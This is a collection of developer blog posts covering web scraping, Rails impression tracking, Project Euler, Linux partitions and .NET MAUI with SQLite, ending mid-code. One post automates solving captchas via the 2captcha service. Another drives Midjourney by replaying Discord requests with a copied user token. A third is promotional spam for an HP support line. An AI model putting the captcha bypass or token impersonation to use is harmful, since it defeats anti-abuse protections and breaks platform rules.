1,658,224 | Efficient HP Device Support: Resolving Printer, Touchpad, and Laptop Keyboard Issues Hassle-Free | In the ever-evolving world of technology, having reliable support for your devices is crucial. When... | 0 | 2023-11-06T11:33:15 | https://dev.to/contactphonenumber/efficient-hp-device-support-resolving-printer-touchpad-and-laptop-keyboard-issues-hassle-free-1pe8 | In the ever-evolving world of technology, having reliable support for your devices is crucial. When it comes to [HP printers support](https://www.contact-phone-number.com/hp-support/), our dedicated team of professionals is committed to providing top-notch solutions for all your printer-related concerns. But printers are not the only devices we specialize in. We understand the frustration that arises when your [touchpad](https://www.contact-phone-number.com/fix-HP-toucHPad-not-working-error/) stops working unexpectedly. Our technicians are well-equipped to diagnose and fix the issue promptly, ensuring you can get back to your tasks without any interruptions. Additionally, if you're facing problems with an [HP laptop keyboard locked](https://www.contact-phone-number.com/troubleshoot-HP-laptop-keyboard-locked-issue/) situation, worry not. Our experts can [troubleshoot](https://www.contact-phone-number.com/troubleshoot-HP-laptop-keyboard-locked-issue/) the problem efficiently, allowing you to regain control of your device. With our reliable support services, you can experience the smooth functioning of your HP devices, making your tech experience hassle-free. | contactphonenumber | |
1,658,327 | Unlocking the World of International Job Listings: A Node.js and Puppeteer Web Scraping Project🚀 | Introduction Job hunting can be a daunting task, especially with countless job platforms... | 0 | 2023-11-06T13:32:17 | https://dev.to/dcerverizzo/unlocking-the-world-of-international-job-listings-a-nodejs-and-puppeteer-web-scraping-project-297m | node, puppeteer, scraper, beginners | ---
title: Unlocking the World of International Job Listings: A Node.js and Puppeteer Web Scraping Project🚀
published: true
description:
tags: nodejs,puppeteer,scraper,beginners
cover_image: https://dev-to-uploads.s3.amazonaws.com/uploads/articles/6l67d1gk58r68qtfq4k1.png
---
## Introduction
Job hunting can be a daunting task, especially with countless job platforms offering excellent opportunities. Faced with this challenge, I decided to streamline my job search by consolidating the most frequently visited websites into a single, accessible resource.
But how did I go about it? My solution was to create a web scraper using cutting-edge technologies such as Puppeteer, Node.js, and MongoDB. This blog post takes you on a journey through the structure and development of this simple yet powerful project.
## The Quest Begins
The first step in my mission to simplify the job search process was to leverage web scraping. Web scraping allowed me to extract data from multiple job websites, collate it, and present it in a user-friendly format.
For this, I chose Puppeteer, a library that drives a headless Chrome browser, and Node.js, a powerful JavaScript runtime. These technologies worked in tandem to retrieve job listings and relevant details. With the data collected, I stored it efficiently using MongoDB, a document-based NoSQL database.
## The Building Blocks
To commence my project, I initiated the process of creating a web scraper using Puppeteer. This technology granted me access to web pages, from where I could extract crucial job listing data.
Node.js played a vital role in orchestrating this process. By utilizing JavaScript, I could craft functions to navigate web pages, retrieve job descriptions, and compile the data into structured information.
## Storing Data for Easy Access
MongoDB, known for its flexibility in handling unstructured data, proved invaluable. It served as the perfect repository for the job listings gathered from web scraping.
The NoSQL database stored each job listing as a document, making it easier to organize, retrieve, and display the data in a user-friendly manner.
## Project structure
The project's root directory is where all your project files and subdirectories reside.
## `src/`
The `src/` directory contains the source code of your project.
- `scripts/`: This directory houses the core logic of your web scraping and database operations.
- `scraper.js`: The main script for web scraping using Puppeteer and Node.js.
- `database.js`: Script for handling MongoDB database operations.
- `server.js`: Your main Node.js application file to serve the scraped data to a frontend.
## `models/`
The `models/` directory contains the data models, schemas, or structures for your project.
- `jobSchema.js`: Defines the schema for job listings to be stored in your MongoDB database.
## `utils/`
The `utils/` directory contains utility files, configurations, and other miscellaneous scripts.
- `sites.js`: A configuration file listing the websites to scrape, including selectors for job details.
- `config.js`: Configuration settings for your database connection.
## `node_modules/`
This directory contains the Node.js modules and packages that your project depends on. You don't need to manage this directory manually.
## `.gitignore`
The `.gitignore` file specifies which files or directories should be ignored when you push your project to a version control system like Git. Commonly, it includes the `node_modules/` directory.
## `package.json`
The `package.json` file lists project metadata and dependencies. It's also where you specify your project's main entry point and various scripts.
## `README.md`
The README file provides essential information about your project, including how to set it up, run it, and any other necessary documentation.
This structured approach keeps your project organized, making it easier to manage and collaborate with others. The main logic for web scraping and database operations is separated, ensuring a clean and maintainable codebase. You can customize this structure based on your specific project needs.
## Code
### The Scraper Class
Our scraper will be encapsulated in a class for modularity and maintainability. Here's what it looks like:
```javascript
// Import necessary modules and configuration
const puppeteer = require('puppeteer');
const sites = require('../utils/sites');
const database = require('../utils/config');
class Scraper {
async scrapeData(site) {
// Create a headless Chromium browser using Puppeteer
const browser = await puppeteer.launch();
const page = await browser.newPage();
try {
// Navigate to the specified website
await page.goto(site.url, { timeout: 600000 });
// Select all job listings on the page using a provided selector
const jobList = await page.$$(`${site.selectors.list}`);
const jobData = [];
// Loop through the job listings and extract relevant information
for (const job of jobList) {
const title = await job.$eval(`${site.selectors.title}`, (element) => element.textContent.trim());
const company = await job.$eval(`${site.selectors.company}`, (element) => element.textContent.trim());
const location = await job.$eval(`${site.selectors.location}`, (element) => element.textContent.trim());
const link = await job.$eval(`${site.selectors.link}`, (element) => element.href);
jobData.push({ title, company, location, link });
}
return jobData;
} finally {
// Close the browser after scraping is complete
await browser.close();
}
}
async init() {
try {
// Connect to the MongoDB database
await database.connect();
// Clear existing data in the database
await database.clearData();
// Scrape data from multiple sites and store it in MongoDB
const scrapedData = (await Promise.all(sites.map((site) => this.scrapeData(site)))).flat(); // flatten the per-site arrays into a single list
// Save scraped data to MongoDB
await database.saveDataToMongoDB(scrapedData);
} catch (error) {
console.error('Error in app:', error);
} finally {
console.log('Finish!');
}
}
}
module.exports = Scraper;
```
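The scraper above delegates persistence to a small database helper. Here's a minimal sketch of what `scripts/database.js` could look like (the exported function names match the calls above; the connection string and database/collection names are assumptions):

```javascript
// scripts/database.js - minimal sketch; connection details are placeholders
const { MongoClient } = require('mongodb');

const client = new MongoClient('mongodb://localhost:27017'); // assumed local MongoDB instance
let collection;

// Open the connection and grab the collection used for job listings
async function connect() {
  await client.connect();
  collection = client.db('jobs').collection('listings'); // assumed names
}

// Wipe previously scraped listings so each run starts fresh
async function clearData() {
  await collection.deleteMany({});
}

// Persist the flattened array of job objects
async function saveDataToMongoDB(jobs) {
  if (jobs.length) {
    await collection.insertMany(jobs);
  }
}

module.exports = { connect, clearData, saveDataToMongoDB };
```

The site configuration consumed by the scraper then looks like this: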
```javascript
// Configuration for websites to scrape
const sites = [
{
name: 'Remotive',
url: 'https://remotive.com/remote-jobs/software-dev',
selectors: {
list: 'li.tw-cursor-pointer',
title: 'a.tw-block > span',
company: 'span.tw-block',
location: 'span.job-tile-location',
link: 'a.tw-block',
},
},
];
module.exports = sites;
```
## Conclusion
The fusion of Puppeteer, Node.js, and MongoDB created a comprehensive solution to simplify job searches. With this project, I centralized data from various websites, making it easier for jobseekers to access the most relevant listings. By sharing this experience, I hope to inspire others to embark on similar projects, harnessing the power of web scraping and innovative technologies. The journey to streamline your job search begins here!
You can access this project online here:
https://jobs-one-drab.vercel.app/
https://github.com/Dcerverizzo/web-scraping-jobs | dcerverizzo |
1,658,374 | # Setting up Impression Tracking with Rails using the Impressionist Gem | Impression tracking is a valuable feature for many web applications as it allows you to keep a count... | 0 | 2023-11-06T13:24:12 | https://dev.to/bhartee_sahare/-setting-up-impression-tracking-with-rails-using-the-impressionist-gem-53oc | Impression tracking is a valuable feature for many web applications as it allows you to keep a count of how many times a specific resource, like a post or a page, has been viewed. In this blog post, we will walk through the process of setting up impression tracking in a Ruby on Rails application using the Impressionist gem.
### Step 1: Creating a New Rails Application
To get started, let's create a new Rails application. You can do this with the following commands:
```bash
rails new impressionist_1_gem
cd impressionist_1_gem
```
### Step 2: Creating the Question Model
In our example, let's assume that we want to track impressions on a `Question` model. We'll create a `Question` model and set up the necessary associations:
```bash
rails generate model Question title content:text
rake db:migrate
```
### Step 3: Adding the Impressionist Gem
Now, let's add the Impressionist gem to your Rails application. Include it in your `Gemfile`:
```ruby
gem 'impressionist'
```
Then run the following commands:
```bash
bundle install
rails generate impressionist
rails db:migrate
```
### Step 4: Setting Up the Impressionist Table
The Impressionist gem generates a migration to create an `impressions` table. Here's an example of what the migration might look like:
```ruby
class CreateImpressionsTable < ActiveRecord::Migration[7.0]
def self.up
create_table :impressions, :force => true do |t|
t.string :impressionable_type
t.integer :impressionable_id
t.integer :user_id
t.string :controller_name
t.string :action_name
t.string :view_name
t.string :request_hash
t.string :ip_address
t.string :session_hash
t.text :message
t.text :referrer
t.text :params
t.timestamps
end
# Add necessary indexes
end
def self.down
drop_table :impressions
end
end
```
### Step 5: Making the Question Model "Impressionable"
In your `Question` model, you need to make it "impressionable" by adding the `is_impressionable` method:
```ruby
# app/models/question.rb
class Question < ApplicationRecord
is_impressionable
# ...
end
```
### Step 6: Using Impression Tracking in the Questions Controller
In your `QuestionsController`, you can use Impressionist to track impressions on specific actions. For example, to track impressions on the `show` and `index` actions:
```ruby
# app/controllers/questions_controller.rb
class QuestionsController < ApplicationController
impressionist :actions => [:show, :index]
# ...
end
```
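Besides the controller-level filter, the gem also exposes an `impressionist` helper for recording an impression manually inside an action, which is handy when you only want to count certain code paths. A minimal sketch (the message string is arbitrary):
```ruby
# app/controllers/questions_controller.rb
def show
  @question = Question.find(params[:id])
  # Manually record an impression for this question, with an optional message
  impressionist(@question, "viewed from show action")
end
```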
### Step 7: Displaying Impression Counts
To display the impression counts in your view, you can use the `impressionist_count` method provided by the Impressionist gem:
```erb
<h1>All Questions</h1>
<table>
<thead>
<tr>
<th>Id</th>
<th>Title</th>
<th>Content</th>
<th>Views</th>
<th colspan="3">Actions</th>
</tr>
</thead>
<tbody>
<% @questions.each do |question| %>
<tr>
<td><%= question.id %></td>
<td><%= question.title %></td>
<td><%= question.content %></td>
<td><%= question.impressionist_count %></td>
<td>
<%= link_to 'Show', question_path(question.id) %> |
<%= link_to 'Destroy', question_path(question.id), method: :delete %> |
<%= link_to 'Edit', edit_question_path(question.id) %>
</td>
</tr>
<% end %>
</tbody>
</table>
```
---
This blog post provides a step-by-step guide on setting up impression tracking in a Ruby on Rails application using the Impressionist gem. It covers the installation of necessary gems, creating models, and configuring impression tracking. With this setup, you can keep track of views on specific resources in your application.
| bhartee_sahare | |
1,669,013 | Project Euler #4 - Two-Headed Monster | Project Euler Series This is a 4th post of ongoing series based on Project Euler. You can check out... | 0 | 2023-11-16T19:57:33 | https://dev.to/fangcode/project-euler-4-two-headed-monster-a56 | kotlin, projecteuler, programming, beginners | > **Project Euler Series**
>
> This is a 4th post of ongoing series based on [Project Euler](https://projecteuler.net/).
> You can check out the previous post [here](https://dev.to/fangcode/project-euler-3-to-sieve-or-not-to-sieve-29f0).
>
> **Disclaimer**
>
> This blogpost provides solution to the 4th problem from Project Euler.
> If you want to figure out a solution yourself, go to the [Problem 4's page](https://projecteuler.net/problem=4) and come back later 😌
This time we have another very popular problem to solve. A palindrome, but with a nice twist. Usually, it's about strings and this one is about numbers.
It's going to be a short one, so let's get to it 😇
> **The Problem**
>
>A palindromic number reads the same both ways. The largest palindrome made from the product of two 2-digit numbers is {% katex inline %}9009 = 91 * 99{% endkatex %}.
>
>Find the largest palindrome made from the product of two 3-digit numbers.
## Am I a Palindrome?
A classic, simple algorithmic problem to solve: is something the same when read from beginning to end as when read from end to beginning? As you can imagine, checking an integer is as simple as checking a single word 🤓
1. We need to change the input into a string.
2. If the input has an even length, we simply split it into two halves; otherwise, we take the largest equal-length parts from both ends, ignoring the middle digit.
3. If the left side is the same as reversed right side, **we have a palindrome**!
### Show Me The Code!
Ok, ok, here you go 😇
```kotlin
fun isPalindromeNumber(value: Int): Boolean {
val valueInString = value.toString()
val valueSize = valueInString.length
val comparisonCellLength = valueSize / 2
val leftSide = valueInString.subSequence(
startIndex = 0,
endIndex = comparisonCellLength,
)
val rightSide = valueInString.subSequence(
startIndex = valueSize - comparisonCellLength,
endIndex = valueSize,
).reversed().toString()
return leftSide == rightSide
}
```
Super simple ❤️
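As a side note, if you'd rather skip the string conversion entirely, the same check can be done arithmetically by reversing the digits. A quick sketch (valid for non-negative inputs):

```kotlin
fun isPalindromeNumberArithmetic(value: Int): Boolean {
    var remaining = value
    var reversed = 0
    // Peel off the last digit and append it to the reversed number
    while (remaining > 0) {
        reversed = reversed * 10 + remaining % 10
        remaining /= 10
    }
    return reversed == value
}
```

Both versions return the same result for the products we check here, so pick whichever reads better to you.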
## Glue Everything Together
In order to get the solution, we need to apply `isPalindromeNumber` to every product of two numbers from {% katex inline %}100{% endkatex %} to {% katex inline %}999{% endkatex %}. Additionally, just out of curiosity, we can count how many palindromes the given configuration produces.
```kotlin
fun getPalindromes(): List<Int> {
val bottom = 100
val top = 999
val palindromes = mutableListOf<Int>()
for (i in top downTo bottom) {
for (j in top downTo bottom) {
val result = i * j
if (isPalindromeNumber(result)) {
palindromes.add(result)
}
}
}
return palindromes
}
// Print the solution
println(getPalindromes().maxOrNull())
```
## The Solution
The answer to the problem is: `906609` and there are `2470` palindromes within the given setup.
## Conclusion
Yet another classic problem to solve, though with a nice twist. That concludes the 4th problem. Nothing more interesting to share here. Just remember the set is created from the products of two numbers, not from a range running from {% katex inline %}100 * 100{% endkatex %} to {% katex inline %}999 * 999{% endkatex %}. | fangcode
1,658,437 | Resizing Your Installed Linux Partition: A Step-by-Step Guide | Resizing your Linux partition can be a bit tricky, especially for new users, especially when you're... | 0 | 2023-11-06T14:46:12 | https://dev.to/deri_kurniawan/how-to-resize-your-linux-partition-p63 | linux, tutorial, beginners | Resizing your Linux partition can be a bit tricky for new users, especially when you're using a dual-boot setup. To make it clear and concise, here's an updated step-by-step guide using Ubuntu as an example.
Please note that if you're not using Ubuntu, the specific Linux distribution mentioned in this guide (Ubuntu) should be replaced with the name of the Linux distribution you have installed, such as Kali, Fedora, or any other distribution.
**Note:** Always back up your important data before attempting any disk partition changes.
**Step 1:** Insert your bootable Ubuntu USB.

**Step 2:** Start or restart your computer and access the boot menu. The key to access the boot menu varies depending on your computer's manufacturer, but it's often something like F12 or F2. Consult your computer's documentation or perform an online search to find the correct key for your machine.
**Step 3:** Select "Try Ubuntu without installing" from the boot menu. If you can't find this option, choose "Install Ubuntu" instead. After selecting "Install Ubuntu," you'll be directed to the installation menu, where you should then see the "Try Ubuntu without installing" option.

**Step 4:** Once you're in the live Ubuntu environment, open GParted.
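GParted ships with most Ubuntu live images, so you can usually launch it straight from the application menu or a terminal. If it happens to be missing, it can be installed in the live session first (these commands assume an Ubuntu-based live environment):

```bash
# Launch GParted from the live session's terminal
sudo gparted

# Only needed if GParted is not preinstalled on your live image
sudo apt update && sudo apt install -y gparted
```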
**Step 5:** In GParted, locate your Ubuntu partition (usually identified as ext4 or a similar filesystem), and carefully resize it to create more space. Ensure that you leave enough space for Ubuntu to function correctly; if in doubt, consult with a knowledgeable friend or online resources to determine the optimal size.
That's it! You've successfully resized your Ubuntu partition. After this, you can proceed with the installation or other tasks as needed. Remember to always back up your data and proceed with caution when resizing partitions to avoid data loss. | deri_kurniawan |
1,658,667 | How to automate an image-based captcha solution in JavaScript | This article describes how to automate image-based captcha solving in JavaScript using Puppeteer and... | 0 | 2023-11-06T18:18:27 | https://dev.to/dzmitry/how-to-automate-an-image-based-captcha-solution-in-javascript-5925 | javascript, captcha, 2captcha, puppeteer | This article describes how to automate image-based captcha solving in JavaScript using [Puppeteer](https://pptr.dev/) and the [2captcha](https://2captcha.com/) service. [Puppeteer](https://pptr.dev/) is a Node.js library used for automation. [2captcha](https://2captcha.com/) is a service used to solve captchas. To interact with the [2captcha](https://2captcha.com/) service, the [2captcha-ts](https://www.npmjs.com/package/2captcha-ts) library is used.
## Algorithm of actions:
1. Open the page in Puppeteer and save the captcha image
2. Sending the captcha to the service
3. We get the answer to the captcha
4. We use the received answer on the page
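Before walking through the steps, note that the snippets below assume a small amount of shared setup: the `fs` and Puppeteer imports, a launched `page`, and a `solver` created from your 2captcha API key. A sketch of that setup (the API key placeholder is yours to fill in, and the `await` calls run inside an async function):

```javascript
const fs = require("fs");
const puppeteer = require("puppeteer");
const Captcha = require("2captcha-ts");

// Create the 2captcha solver with your API key
const solver = new Captcha.Solver("<YOUR_2CAPTCHA_API_KEY>");

// Launch a headless browser and open the page used in the steps below
const browser = await puppeteer.launch();
const page = await browser.newPage();
```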
### Step #1 - Open the page in Puppeteer and save the captcha image
For example, let’s open a demo page with a captcha image and save the captcha image:
```js
// Open page
await page.goto("https://2captcha.com/demo/normal");
await page.waitForSelector('img[alt="normal captcha example"]');
const element = await page.$('img[alt="normal captcha example"]');
// Save captcha
await element.screenshot({ path: "./image_captcha.png" });
```
### Step #2 - Sending the captcha to the service
```js
const getCaptchaAnswer = async () => {
try {
const base64Captcha = fs.readFileSync("./image_captcha.png", "base64");
// Sending captcha to 2captcha.com service
const res = await solver.imageCaptcha({
body: base64Captcha,
});
return res.data;
} catch (err) {
console.log(err);
}
};
```
### Step #3 - We get the answer to the captcha
```js
const captchaAnswer = await getCaptchaAnswer();
console.log("captchaAnswer:" + captchaAnswer);
```
### Step #4 - We use the received answer on the page
```js
// Typing the received answer into the answer field
await page.type("#simple-captcha-field", captchaAnswer, { delay: 500 });
await page.evaluate(() => {
// Click on 'check' button
document.querySelector("button[type=submit]").click();
});
```
Full code example available on [GitHub](https://github.com/dzmitry-duboyski/normal-captcha-example/blob/main/index.js) | dzmitry |
1,658,690 | First Open Source Contribution 🧑💻 | Intro This October was my first Open Source contribution and I am glad to part of it. I've... | 0 | 2023-11-06T19:13:33 | https://dev.to/judesan/first-open-source-contribution-o55 | hack23contributor |
### Intro
This October was my first Open Source contribution and I am glad to part of it.
I've found a real passion for contributing to open source and am always excited about the opportunity to give back to the community. My journey in Hacktoberfest 2023 led me to explore new projects and collaborate with amazing developers from around the world. Check out my contributions on my GitHub profile.
### Highs and Lows
One of the highs this month was getting my pull request merged into a project I've been using as a developer for quite some time. The sense of accomplishment was profound, and it reinforced my love for coding and collaboration.
On the flip side, I encountered a particularly stubborn bug in one of my submissions. Despite the initial frustration, this roadblock turned into a learning opportunity. It taught me to reach out more to the community, and with some guidance from seasoned maintainers, I was able to overcome the challenge. This was a reminder of the power of community in open source.
### Growth
My learning goals have certainly evolved. I now aim to contribute more regularly to open-source projects, not just in October. Professionally, I've become more interested in backend development thanks to the projects I've contributed to. Hacktoberfest has been a catalyst for this growth, and I'm excited to see where these new skills will take me in my career. | judesan |
1,658,981 | ⤴️How to build a Midjourney API with Nest.js 🚀 | TL;DR In this post I will show you the architecture of building an unofficial Midjourney... | 0 | 2023-11-29T10:59:17 | https://dev.to/confidentai/how-to-build-unofficial-midjourney-api-with-nestjs-1lnd | javascript, midjourney, api, nestjs | ## TL;DR
In this post I will show you the architecture of building an unofficial Midjourney API with Typescript and Nest.js.

---
### DeepEval - open-source evaluation framework for LLM applications
#### DeepEval evaluates performance based on metrics such as factual consistency, accuracy, answer relevancy
We are just starting out.
Can you help us with a star, please? 😽
https://github.com/confident-ai/deepeval

---
➡️ Please **Like, Heart and star this article**
---
## What are we going to build?
To start off, let's understand how Midjourney works on Discord. People use simple commands to talk to an AI bot. The bot then takes these commands and creates pictures that match the descriptions given by the users.
In order to mimic this type of behavior, we will need to create an API that interacts with a Discord Bot. This bot has the ability to interact with Discord, hence send commands to Midjourney. Here is a high level design of the command flow:

**Important**: This tutorial is only for educational purposes and for understanding the nature of the Discord and Midjourney interaction. It is not recommended to use it as a production service or in any official project.
The reason I chose Nest.js is that there are plenty of Python examples of how to build an API for Midjourney, but no decent one that shows the process using JavaScript or Node.js. I also prefer Nest.js because it is well organized and makes bootstrapping a project easy.
### Connecting a Midjourney's Discord bot
In the absence of a formal API, a connection to Midjourney is facilitated via a Discord bot. The process includes the following steps.
**Important**: In order for this to work, you must have a Midjourney subscription.
---
#### Step 1: Create a Discord bot.
Take a moment to help me please. I am working very hard to create the best open source for LLM evaluation.
Please give me a star - I will truly appreciate it.
{% cta https://github.com/confident-ai/deepeval %} 🌟 DeepEval on GitHub {% endcta %}
The first step towards a complete Midjourney API is to create our Discord bot. Discord has an interface for creating bots for different purposes. Go ahead [and create your MJ bot](https://discord.com/developers/applications).

Here is a [great article](https://www.upwork.com/resources/how-to-make-discord-bot) for creating a Discord bot.
Once you've created the bot, you'll receive an invite link. Use it to invite the bot to your Discord server - we'll use this later to generate and receive images.
---
#### Step 2: Implementing /Imagine command
Once you've created a [Nest.js](https://nestjs.com/) app, go ahead and create your `discord` module. This module will interact with our Discord server and Midjourney.
Let's begin with our *controller*, which should look something like this:
```javascript
@Controller('discord')
export class DiscordController {
constructor(private discordService: DiscordService) {}
@Post('imagine')
async imagine(@Body('prompt') prompt: string): Promise<any> {
return this.discordService.sendImagineCommand(prompt);
}
}
```
As you can see, I have created a discord module with a single `POST` request. We will pass a `prompt` to our `discord/imagine` request.
Next, let's create our discord service:
```javascript
@Injectable()
export class DiscordService {
constructor(private readonly httpService: HttpService) {}
async sendImagineCommand(prompt: string): Promise<any> {
const postUrl = "https://discord.com/api/v9/interactions";
const uniqueId = this.generateId();
const postPayload = {
type: 2,
application_id: <APPLICATION_ID>,
guild_id: <GUILD_ID>,
channel_id: <CHANNEL_ID>,
session_id: <SESSION_ID>,
data: {
version: <COMMAND_VERSION>,
id: <IMAGINE_COMMAND_ID>,
name: "imagine",
type: 1,
options: [
{
type: 3,
name: "prompt",
value: `${prompt} --no ${uniqueId}`
}
],
application_command: {
id: <IMAGINE_COMMAND_ID>,
application_id: <APPLICATION_ID>,
version: <COMMAND_VERSION>,
default_member_permissions: null,
type: 1,
nsfw: false,
name: "imagine",
description: "Create images with Midjourney",
dm_permission: true,
contexts: [0, 1, 2],
options: [
{
type: 3,
name: "prompt",
description: "The prompt to imagine",
required: true
}
]
},
attachments: []
}
};
const postHeaders = {
authorization: <your auth token>,
"Content-Type": "application/json"
};
this.httpService
.post(postUrl, postPayload, { headers: postHeaders })
.toPromise()
.then(console.log);
return uniqueId;
}
generateId(): number {
return Math.floor(Math.random() * 1000);
}
}
```
You will notice a few things here:
- We are using `https://discord.com/api/v9/interactions` discord endpoint to interact with Discord server and send commands. This is the main entry point to deal with requests to Midjourney.
- We mimic a web-browser request to Discord, and here is the real "magic": sign in to Discord in your web browser, then send the `/imagine` command to Midjourney from the Discord web interface.
Once the request is sent, you will also see the imagine command in the `Network` tab, with a payload very similar to the one above.
- Copy the relevant fields : `IMAGINE_COMMAND_ID` , `COMMAND_VERSION`, `SESSION_ID`, `GUILD_ID`, `CHANNEL_ID` and `APPLICATION_ID`. This will be used on our service. We also need to copy `MIDJOURNEY_TOKEN` which is sent as part of the request.
- Copy `BOT_TOKEN` from the bot application page we created earlier. This is important in order to communicate with our bot.
- You will also notice the `uniqueId` that we generate using our `generateId()` function. This is using Midjourney's `--no` command so we can later track back the unique request sent to Discord and get the generated images.
Once this step is complete, you are able to call Discord with the `/imagine` command and generate images with Midjourney.
**Reminder** : This is only a technical post describing how this flow works, and is not recommended for use for any project.
---
#### Step 3: Fetching generated images.
Let's create a new controller to fetch images:
```javascript
@Get('mj/results/:id')
async getMidjourneyResults(@Param('id') id: string) {
// Note: `get` is lodash's get helper (import { get } from 'lodash';)
const image = await this.discordService.getResultFromMidjourney(id);
const attachmentUrl = get(image[0].attachments[0], 'url');
if (attachmentUrl) {
// processAndUpload is a service method not shown in this post
const urls = await this.discordService.processAndUpload(attachmentUrl);
return urls;
}
return image;
}
```
We are going to use the unique `id` generated when creating our `/imagine` request, in order to fetch results from Discord.
```javascript
async getResultFromMidjourney(id: string): Promise<any> {
const headers = {
"Authorization": MIDJOURNEY_TOKEN,
"Content-Type": "application/json"
};
const channelUrl = `https://discord.com/api/v9/channels/${CHANNEL_ID}/messages?limit=50`;
try {
const response = await this.httpService.get(channelUrl, { headers: headers }).toPromise();
const data = response.data;
const matchingMessages = data.filter(message =>
message.content.includes(id) &&
message
.components
.some(component => component.components.some(c => c.label === "U1")) // "U1" present means the result can be upscaled
) || [];
if (!matchingMessages.length) {
return null;
}
// filter() returns an array, so read the attachments from the first matching message
const matchingMessage = matchingMessages[0];
if (matchingMessage.attachments && matchingMessage.attachments.length > 0) {
for (const attachment of matchingMessage.attachments) {
attachment.url = await this.fetchAndEncodeImage(attachment.url);
}
}
return matchingMessages;
} catch (error) {
console.error('Error fetching results from Discord:', error);
}
}
async fetchAndEncodeImage(url: string): Promise<string> {
const response: AxiosResponse<any> = await this.httpService.get(url, {
responseType: 'arraybuffer',
}).toPromise();
const base64 = Buffer.from(response.data, 'binary').toString('base64');
return `data:${response.headers['content-type']};base64,${base64}`;
}
```
The `https://discord.com/api/v9/channels/${CHANNEL_ID}/messages?limit=50` endpoint is used to fetch the latest messages from our Discord channel so we can retrieve our images.
Since Midjourney generation takes about 60 seconds or more, we will need to poll this channel every x seconds to check for results.
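A minimal polling sketch, assuming the service from above is available; the interval and attempt limit are arbitrary choices:

```javascript
// Poll the channel until Midjourney has finished generating, then return the messages
async function pollForResult(discordService, id, intervalMs = 10000, maxAttempts = 30) {
  for (let attempt = 0; attempt < maxAttempts; attempt++) {
    const result = await discordService.getResultFromMidjourney(id);
    if (result && result.length) {
      return result;
    }
    // Wait before the next check
    await new Promise((resolve) => setTimeout(resolve, intervalMs));
  }
  throw new Error(`No Midjourney result for id ${id} after ${maxAttempts} attempts`);
}
```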
Let's give it a try with `{ prompt: "a cat" }` :

---
That's it! You should now have a fully working Midjourney API for testing and fun and you've learned how Discord bot architecture works.
### Final thoughts
You now have a bootstrap project that demonstrates how Discord communicates with Midjourney to generate the most amazing AI images.
You can build a nice UI and have your own generative AI platform. Good luck!
| guybuildingai |
1,659,347 | Easily Bind SQLite Data to .NET MAUI ListView and Perform CRUD Actions | In this blog, we’ll see how to bind and populate data from an SQLite database in the Syncfusion .NET... | 0 | 2023-11-10T04:20:30 | https://www.syncfusion.com/blogs/post/sqlite-data-to-net-maui-listview.aspx | dotnetmaui, crud, mobile, sqlite | ---
title: Easily Bind SQLite Data to .NET MAUI ListView and Perform CRUD Actions
published: true
date: 2023-11-07 11:12:18 UTC
tags: dotnetmaui, crud, mobile, sqlite
canonical_url: https://www.syncfusion.com/blogs/post/sqlite-data-to-net-maui-listview.aspx
cover_image: https://dev-to-uploads.s3.amazonaws.com/uploads/articles/1gnywe7l39synlujt5ak.png
---
In this blog, we’ll see how to bind and populate data from an SQLite database in the Syncfusion .NET MAUI ListView. We’ll also see how to perform CRUD (create, read, update, and delete) operations on the database and update the changes in the ListView.
The Syncfusion [.NET MAUI ListView](https://www.syncfusion.com/maui-controls/maui-listview ".NET MAUI ListView") control is used to present lists of data in a vertical or horizontal orientation with different layouts. It supports essential features such as selection, template selectors, horizontal and vertical orientation, load more, and autofitting items. The control also supports sorting, grouping, and filtering with optimization for working with large amounts of data.
[SQLite](https://en.wikipedia.org/wiki/SQLite "Wikipedia Link: SQLite") is a lightweight, open-source, and self-contained relational database management system (RDBMS). It stands out for its simplicity and efficiency, making it a popular choice for embedded and mobile apps, as well as desktop software.
**Note:** If you are new to the ListView control, refer to the [.NET MAUI ListView getting started documentation](https://help.syncfusion.com/maui/listview/getting-started "Getting started with .NET MAUI ListView").
## Binding SQLite data to the .NET MAUI ListView
In this demo, we’re going to bind and populate data regarding contact details from an SQLite database in Syncfusion .NET MAUI ListView control.
To do so, please follow these steps:
## Step 1: Install the required packages
Install the following required packages for the SQLite DB connection in your project.
<figure>
<img src="https://www.syncfusion.com/blogs/wp-content/uploads/2023/11/Installing-packages-to-connect-to-my-SQLite-database.png" alt="Installing packages to connect to SQLite database" style="width:100%">
<figcaption>Installing packages to connect to SQLite database</figcaption>
</figure>
## Step 2: Define the class to access the database
Define the **Constants** class with the required database properties.
```csharp
public static class Constants
{
public const string DatabaseFilename = "SQLiteDB.db";
public const SQLite.SQLiteOpenFlags Flags =
// open the database in read/write mode
SQLite.SQLiteOpenFlags.ReadWrite |
// create the database if it doesn't exist
SQLite.SQLiteOpenFlags.Create |
// enable multi-threaded database access
SQLite.SQLiteOpenFlags.SharedCache;
public static string DatabasePath =>
Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), DatabaseFilename);
}
```
Define the SQLite connection using the **SQLiteAsyncConnection** API with the database properties we defined in the **Constants** class. Then, create a table named **Contact** in that SQLite database.
```csharp
public class SQLiteDatabase
{
readonly SQLiteAsyncConnection _database;
public SQLiteDatabase()
{
_database = new SQLiteAsyncConnection(Constants.DatabasePath, Constants.Flags);
_database.CreateTableAsync<Contact>(); // fire-and-forget here; ensure the table exists before the first query in production
}
}
```
## Step 3: Create an instance for the SQLite connection
Now, we can create a singleton instance for the SQLite connection and initialize it in the **App.Xaml.cs** file to use the database in our business class **ViewModel**.
Refer to the following code example.
```csharp
public partial class App : Application
{
public App()
{
InitializeComponent();
}
static SQLiteDatabase database;
// Create the database connection as a singleton.
public static SQLiteDatabase Database
{
get
{
if (database == null)
{
database = new SQLiteDatabase();
}
return database;
}
}
}
```
## Step 4: Create the Contact class
Define a **Model** class named **Contact** to hold the property values from the database table.
```csharp
public class Contact : INotifyPropertyChanged
{
#region Fields
public int id;
private string name;
private string number;
private string image;
#endregion
[PrimaryKey, AutoIncrement]
[Display(AutoGenerateField = false)]
public int ID { get; set; }
public string Name
{
get { return this.name; }
set
{
this.name = value;
RaisePropertyChanged("Name");
}
}
public string Number
{
get { return number; }
set
{
this.number = value;
RaisePropertyChanged(“Number”);
}
}
[Display(AutoGenerateField = false)]
public string Image
{
get { return this.image; }
set
{
this.image = value;
this.RaisePropertyChanged("Image");
}
}
#region INotifyPropertyChanged implementation
public event PropertyChangedEventHandler PropertyChanged;
private void RaisePropertyChanged(string name)
{
if (PropertyChanged != null)
this.PropertyChanged(this, new PropertyChangedEventArgs(name));
}
#endregion
}
```
## Step 5: Populating database data in the ViewModel
Populate the data from the SQLite database in the **ContactsViewModel** class, as shown in the following code example.
```csharp
public class ContactsViewModel : INotifyPropertyChanged
{
#region Fields
